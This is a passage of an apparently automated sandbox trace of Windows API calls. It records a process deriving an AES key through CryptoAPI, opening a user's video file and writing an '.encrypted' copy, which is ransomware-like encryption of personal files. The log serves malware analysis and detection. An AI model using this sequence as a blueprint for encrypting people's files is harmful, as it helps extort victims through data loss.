ftLastWriteTime.dwLowDateTime=0x22ef5700, ftLastWriteTime.dwHighDateTime=0x1d5c284, nFileSizeHigh=0x0, nFileSizeLow=0x1dee, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Myt71e.flv", cAlternateFileName="")) returned 0x7c2240 [0043.229] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.229] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.229] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.229] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.229] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.229] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.229] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.229] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.229] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.229] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.229] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.229] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.230] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.230] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.230] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.230] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.230] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.230] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0043.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.231] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.231] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.231] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.231] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.231] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.231] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.231] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.231] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.232] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.232] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.232] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.232] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.232] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.232] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.232] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.232] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.232] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.232] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.232] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.233] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.233] CryptHashData (hHash=0x7c2100, pbData=0x7c9758, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.233] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.233] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.233] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.233] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.233] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.233] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.234] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.234] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.234] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.234] CryptDestroyHash (hHash=0x7c2100) returned 1 [0043.234] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.234] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\myt71e.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.234] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.234] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0043.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.234] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.234] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0043.235] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.235] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.235] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.236] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.236] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0043.236] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b")) returned 0x10 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.237] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\Myt71e.encrypted.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\myt71e.encrypted.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.237] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.237] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.237] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.238] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.238] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0043.238] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0043.238] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.238] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 